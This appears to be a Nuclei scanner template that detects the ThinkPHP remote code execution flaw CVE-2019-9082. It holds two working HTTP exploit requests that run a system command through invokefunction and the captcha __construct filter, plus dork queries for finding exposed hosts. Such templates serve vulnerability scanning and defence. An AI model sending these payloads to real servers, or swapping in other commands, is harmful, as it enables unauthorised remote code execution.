id: CVE-2019-9082 info: name: ThinkPHP < 3.2.4 - Remote Code Execution author: 0xanis severity: high description: | ThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via the s parameter in index.php through the invokefunction functionality. impact: | Attackers can execute arbitrary system commands true the server without authentication, potentially leading to full system compromise. remediation: | Update to ThinkPHP 3.2.4 or later, or apply vendor patches. reference: - https://github.com/xyl-tools/open_source_bms/issues/33 - http://packetstormsecurity.com/files/157218/ThinkPHP-5.0.23-Remote-Code-Execution.html - https://www.exploit-db.com/exploits/46488/ - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/thinkphp_rce.rb - https://nvd.nist.gov/vuln/detail/CVE-2019-9082 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 cwe-id: CWE-94 cpe: cpe:2.3:a:opensourcebms:open_source_background_management_system:1.1.1:*:*:*:*:*:*:* epss-score: 0.94207 epss-percentile: 0.99925 metadata: verified: true max-request: 2 fofa-query: app="ThinkPHP" google-query: inurl:"index.php?s=" "thinkphp" tags: cve,cve2019,thinkphp,open_source_bms,none_cms,rce,kev,vkev http: - raw: - | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20thinkphp%20%7C%20rev HTTP/1.1 Host: {{Hostname}} - | POST /index.php?s=captcha HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo%20thinkphp%20%7C%20rev stop-at-first-match: true matchers: - type: dsl dsl: - 'contains(body, "phpkniht")' - 'status_code == 200 || status_code == 500' condition: and # digest: 4a0a0047304502204d8dd8755b6f96146e40070c36f4c3df629db7e54f5efe36262c2ac88c38eb55022100e69815f653cb355b983922eb6bbc2e61ced33d530ac2fc77e6a2689ed3168943:922c64590222798bb761d5b6d8e72950